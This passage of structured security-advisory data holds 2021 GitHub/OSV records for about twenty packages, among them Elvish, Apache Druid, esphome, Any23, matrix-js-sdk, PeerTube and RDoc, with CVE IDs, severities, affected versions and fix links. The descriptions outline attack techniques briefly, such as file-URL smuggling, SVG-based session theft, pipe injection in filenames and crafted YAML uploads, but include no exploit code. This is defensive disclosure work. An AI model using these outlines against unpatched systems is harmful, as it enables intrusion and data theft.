[{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-v4cp-h94r-m7xf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39216'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/commit/101998733b74624cbd348a2366d05760b40181f3'}, {'type': 'WEB', 'url': 'https://crates.io/crates/wasmtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/wasmtime'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0110.html'}]
{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T20:05:21Z', 'nvd_published_at': '2021-09-17T20:15:00Z'}
1.4.0
GHSA-fpv6-f8jw-rc3r
2022-08-15T20:07:49Z
2021-09-23T23:17:33Z
null
['CVE-2021-41088']
Elvish vulnerable to remote code execution via the web UI backend
### Impact Elvish's backend for the experimental web UI (started by `elvish -web`) hosts an endpoint that allows executing the code sent from the web UI. The backend does not check the origin of requests correctly. As a result, if the user has the web UI backend open and visits a compromised or malicious website, the website can send arbitrary code to the endpoint in localhost. ### Patches All Elvish releases since 0.14.0 no longer include the experimental web UI, although it is still possible for the user to build a version from source that includes it. The issue can be patched for previous versions by removing the web UI (found in web, pkg/web or pkg/prog/web, depending on the exact version). ### Workarounds Do not use the experimental web UI. ### For more information If you have any questions or comments about this advisory, please email xiaqqaix@gmail.com.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/elves/elvish'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/elves/elvish/security/advisories/GHSA-fpv6-f8jw-rc3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41088'}, {'type': 'WEB', 'url': 'https://github.com/elves/elvish/commit/ccc2750037bbbfafe9c1b7a78eadd3bd16e81fe5'}, {'type': 'PACKAGE', 'url': 'https://github.com/elves/elvish'}]
{'cwe_ids': ['CWE-346', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T21:06:47Z', 'nvd_published_at': '2021-09-23T20:15:00Z'}
1.4.0
GHSA-9p5g-vg43-mj5r
2023-09-26T13:13:17Z
2021-09-27T20:13:25Z
null
['CVE-2021-36749']
Druid ingestion system Authenticated users can read data from other sources than intended
In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36749'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-793h-6f7r-6qvm'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E'}]
{'cwe_ids': ['CWE-668', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-27T19:20:40Z', 'nvd_published_at': '2021-09-24T10:15:00Z'}
1.4.0
GHSA-48mj-p7x2-5jfm
2021-09-28T21:10:08Z
2021-09-29T17:09:14Z
null
['CVE-2021-41104']
Basic auth bypass in esphome
### Impact Anyone with web_server enabled and HTTP basic auth configured on 2021.9.1 or older `web_server` allows OTA update without checking user defined basic auth username & password ### Patches Patch released in 2021.9.2 ### Workarounds Disable/remove `web_server`
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'esphome'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2021.9.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/esphome/esphome/security/advisories/GHSA-48mj-p7x2-5jfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41104'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/pull/2409/commits/207cde1667d8c799a197b78ca8a5a14de8d5ca1e'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/commit/be965a60eba6bb769e2a5afdbc8eed132f077a59'}, {'type': 'PACKAGE', 'url': 'https://github.com/esphome/esphome'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/releases/tag/2021.9.2'}]
{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:10:08Z', 'nvd_published_at': '2021-09-28T16:15:00Z'}
1.4.0
GHSA-fhv8-fx5f-7fxf
2022-09-11T22:26:04Z
2021-09-20T19:53:15Z
null
['CVE-2021-39227']
Prototype Pollution in the merge and clone helper methods
### Impact Using `merge` and `clone` helper methods in the `src/core/util.ts` module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly. ### Patches It has been patched in https://github.com/ecomfe/zrender/pull/826. Users should update zrender to `5.2.1`. and update echarts to `5.2.1` if project is using echarts.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'zrender'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/security/advisories/GHSA-fhv8-fx5f-7fxf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39227'}, {'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/pull/826'}, {'type': 'PACKAGE', 'url': 'https://github.com/ecomfe/zrender'}, {'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/releases/tag/5.2.1'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T17:51:46Z', 'nvd_published_at': '2021-09-17T14:15:00Z'}
1.4.0
GHSA-99px-7724-484v
2021-09-24T13:10:31Z
2021-09-13T20:06:38Z
null
['CVE-2021-40146']
Remote Code Execution in Any23
A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.any23:apache-any23'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40146'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/any23'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7c521ed85c7ae1bad4fdf95b459f2aaa8a67eae338636b7b7ec35d86%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/09/11/2'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:31:57Z', 'nvd_published_at': '2021-09-11T11:15:00Z'}
1.4.0
GHSA-c442-3278-rhrg
2021-09-16T19:26:04Z
2021-09-09T17:08:46Z
null
['CVE-2021-36440']
Unrestricted File Upload in ShowDoc v2.9.5
Unrestricted File Upload in ShowDoc v2.9.5 allows remote attackers to execute arbitrary code via the 'file_url' parameter in the component AdminUpdateController.class.php'.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36440'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/issues/1406'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/49b992d4c548c8c615a92b6efe8a50c8f1083abf'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}]
{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T13:18:05Z', 'nvd_published_at': '2021-09-08T21:15:00Z'}
1.4.0
GHSA-45h5-r968-5xr7
2021-09-27T18:51:18Z
2021-09-20T20:29:40Z
null
['CVE-2021-22147']
Exposure of sensitive information in Elasticsearch
A flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.11.0'}, {'fixed': '7.14.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22147'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-14-0-security-update/280344'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0002/'}, {'type': 'WEB', 'url': 'https://www.elastic.co/community/security/'}]
{'cwe_ids': ['CWE-732', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:10:33Z', 'nvd_published_at': '2021-09-15T12:15:00Z'}
1.4.0
GHSA-23cm-x6j7-6hq3
2023-08-08T19:58:08Z
2021-09-14T20:24:18Z
null
['CVE-2021-40823']
matrix-js-sdk can be tricked into disclosing E2EE room keys to a participating homeserver
### Impact A logic error in the room key sharing functionality of matrix-js-sdk before 12.4.1 allows a malicious Matrix homeserver† participating in an encrypted room to steal room encryption keys from affected Matrix clients participating in that room. This allows the homeserver to decrypt end-to-end encrypted messages sent by affected clients. † Or anyone with access to the account of the original recipient of an encrypted message. Known clients affected (via their use of vulnerable versions of matrix-js-sdk): - Element Web (1.8.2 and earlier) - Element Desktop (1.8.2 and earlier) - SchildiChat Web (1.7.32-sc1 and earlier) - SchildiChat Desktop (1.7.32-sc1 and earlier) - Cinny (1.2.0 and earlier) ### Patch This was fixed in https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9. ### Workarounds To prevent a homeserver from being able to steal the room keys, vulnerable clients can be taken offline or signed out. If signing out, care should be taken to either set up Secure Backup or export E2E room keys in order to preserve access to past messages.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'matrix-js-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-23cm-x6j7-6hq3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40823'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-js-sdk'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/releases/tag/v12.4.1'}, {'type': 'WEB', 'url': 'https://matrix.org/blog/2021/09/13/vulnerability-disclosure-key-sharing'}]
{'cwe_ids': ['CWE-200', 'CWE-327'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T18:08:41Z', 'nvd_published_at': '2021-09-13T19:15:00Z'}
1.4.0
GHSA-qvm7-23cj-437v
2021-09-20T20:15:45Z
2021-09-10T17:54:37Z
null
['CVE-2021-36161']
Remote Code Execution in Apache Dubbo
Some component in Dubbo will try to print the formated string of the input arguments, which will possibly cause RCE for a maliciously customized bean with special toString method. In the latest version, we fix the toString call in timeout, cache and some other places. Fixed in Apache Dubbo 2.7.13
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.13'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36161'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r40212261fd5d638074b65f22ac73eebe93ace310c79d4cfcca4863da%40%3Cdev.dubbo.apache.org%3E'}]
{'cwe_ids': ['CWE-134'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-10T16:45:06Z', 'nvd_published_at': '2021-09-09T08:15:00Z'}
1.4.0
GHSA-f2c5-997w-7f5c
2021-09-24T13:07:20Z
2021-09-20T20:42:41Z
null
['CVE-2021-3780']
Cross-site Scripting in peertube
peertube is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). It was found that one could upload a SVG image and then send the url of that to other users and when they open the link we can get their complete session keys as the session keys stored in local storage and with Javascript easily can be stolen by attackers.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'peertube'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3780'}, {'type': 'WEB', 'url': 'https://github.com/chocobozzz/peertube/commit/0ea2f79d45b301fcd660efc894469a99b2239bf6'}, {'type': 'PACKAGE', 'url': 'https://github.com/chocobozzz/peertube'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/282807a8-4bf5-4fe2-af62-e05f945b3d65'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:32:58Z', 'nvd_published_at': '2021-09-15T12:15:00Z'}
1.4.0
GHSA-q4rf-3fhx-88pf
2021-08-30T22:03:16Z
2021-09-01T18:27:01Z
null
['CVE-2021-39132']
YAML deserialization can run untrusted code
### Impact An authorized user can upload a zip-format plugin with a crafted plugin.yaml, or a crafted aclpolicy yaml file, or upload an untrusted project archive with a crafted aclpolicy yaml file, that can cause the server to run untrusted code on Rundeck Community or Enterprise Edition. An authenticated user can make a POST request, that can cause the server to run untrusted code on Rundeck Enterprise Edition. The zip-format plugin issues requires authentication and authorization to these access levels, and affects all Rundeck editions: * `admin` level access to the `system` resource type The ACL Policy yaml file upload issues requires authentication and authorization to these access levels, and affects all Rundeck editions: * `create` `update` or `admin` level access to a `project_acl` resource * `create` `update` or `admin` level access to the `system_acl` resource The unauthorized POST request requires authentication, but no specific authorization, and affects Rundeck Enterprise only. ### Patches Versions 3.4.3, 3.3.14 ### Workarounds Please visit [https://rundeck.com/security](https://rundeck.com/security) for information about specific workarounds. ### For more information If you have any questions or comments about this advisory: * Email us at [security@rundeck.com](mailto:security@rundeck.com) To report security issues to Rundeck please use the form at [https://rundeck.com/security](https://rundeck.com/security) Reporter: Rojan Rijal from Tinder Red Team
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.rundeck:rundeck-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.rundeck:rundeck-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.14'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/rundeck/rundeck/security/advisories/GHSA-q4rf-3fhx-88pf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39132'}, {'type': 'WEB', 'url': 'https://github.com/rundeck/rundeck/commit/850d12e21d22833bc148b7f458d7cb5949f829b6'}, {'type': 'PACKAGE', 'url': 'https://github.com/rundeck/rundeck'}]
{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T22:03:16Z', 'nvd_published_at': '2021-08-30T20:15:00Z'}
1.4.0
GHSA-ggxm-pgc9-g7fp
2022-07-29T17:57:31Z
2021-09-01T18:53:15Z
null
['CVE-2021-31799']
Arbitrary Code Execution in Rdoc
In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11'}, {'fixed': '6.1.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.1.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31799'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rdoc/commit/a7f5d6ab88632b3b482fe10611382ff73d14eed7'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/rdoc'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rdoc/CVE-2021-31799.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00009.html'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2021-31799'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210902-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/05/02/os-command-injection-in-rdoc/'}]
{'cwe_ids': ['CWE-74', 'CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:08:41Z', 'nvd_published_at': '2021-07-30T14:15:00Z'}
1.4.0
GHSA-2v88-qq7x-xq5f
2021-09-01T18:20:20Z
2021-09-01T18:21:55Z
null
['CVE-2021-39170']
Improper Encoding or Escaping of Output in Asset Metadata Component
Pimcore is an open source data & experience management platform. Prior to version 10.1.2, an authenticated user could add XSS code as a value of custom metadata on assets. There is a patch for this issue in Pimcore version 10.1.2. As a workaround, users may apply the patch manually.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 10.1.1'}}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-2v88-qq7x-xq5f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39170'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10178'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10178.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10206'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c3e4cf79-a4b5-4982-af27-729f66281501/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e4cb9cd8-89cf-427c-8d2e-37ca40099bf2/'}]
{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T18:20:20Z', 'nvd_published_at': '2021-09-01T14:15:00Z'}
1.4.0
GHSA-9gr3-7897-pp7m
2021-08-31T20:01:51Z
2021-09-01T18:24:22Z
null
['CVE-2021-39178']
XSS in Image Optimization API for Next.js
### Impact - **Affected:** All of the following must be true to be affected - Next.js between version 10.0.0 and 11.1.0 - The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned - The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG - **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default - **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected ### Patches [Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '11.1.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/vercel/next.js/security/advisories/GHSA-9gr3-7897-pp7m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39178'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/pull/28620'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/commit/7afc97c5744b38bdf36aa7f87625f438224688aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/releases/tag/v11.1.1'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T20:01:51Z', 'nvd_published_at': '2021-08-31T00:15:00Z'}
1.4.0
GHSA-729f-wvj3-c4pj
2023-09-26T17:31:51Z
2021-09-20T20:45:03Z
null
['CVE-2020-21125']
Remote code execution in UReport
An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21125'}, {'type': 'WEB', 'url': 'https://github.com/youseries/ureport/issues/485'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}]
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T18:50:53Z', 'nvd_published_at': '2021-09-15T17:15:00Z'}
1.4.0
GHSA-6gr8-c3m5-mvrg
2021-06-25T15:26:54Z
2021-09-08T18:00:47Z
null
['CVE-2021-32717']
Exposure of Sensitive Information to an Unauthorized Actor
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html. Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-vrf2-xghr-j52v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32717'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/ba52f683372b8417a00e9014f481ed3d539f34b3'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-06-2021'}]
{'cwe_ids': ['CWE-200', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:26:54Z', 'nvd_published_at': '2021-06-24T21:15:00Z'}
1.4.0
GHSA-f34x-8pf6-qc9c
2021-09-15T18:27:54Z
2021-09-08T17:42:18Z
null
['CVE-2021-40143']
HTTP header injection in Sonatype Nexus Repository
Sonatype Nexus Repository 3.x through 3.33.1-01 is vulnerable to an HTTP header injection. By sending a crafted HTTP request, a remote attacker may disclose sensitive information or request external resources from a vulnerable instance.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.sonatype.nexus:nexus-repository'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.34.0-01'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.33.1-01'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40143'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonatype/nexus-public'}, {'type': 'WEB', 'url': 'https://help.sonatype.com/repomanager3/release-notes/2021-release-notes'}, {'type': 'WEB', 'url': 'https://issues.sonatype.org/secure/ReleaseNote.jspa'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/4405941762579'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T17:35:50Z', 'nvd_published_at': '2021-09-07T20:15:00Z'}
1.4.0
GHSA-gjwp-7v3g-99pj
2021-08-25T18:00:40Z
2021-09-02T17:09:05Z
null
['CVE-2021-23431']
Cross-site Request Forgery (CSRF) in joplin
The package joplin before 2.3.2 are vulnerable to Cross-site Request Forgery (CSRF) due to missing CSRF checks in various forms.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23431'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/19b45de2981c09f6f387498ef96d32b4811eba5e'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOPLIN-1325537'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T18:00:40Z', 'nvd_published_at': '2021-08-24T08:15:00Z'}
1.4.0
GHSA-2p89-5f22-8qvf
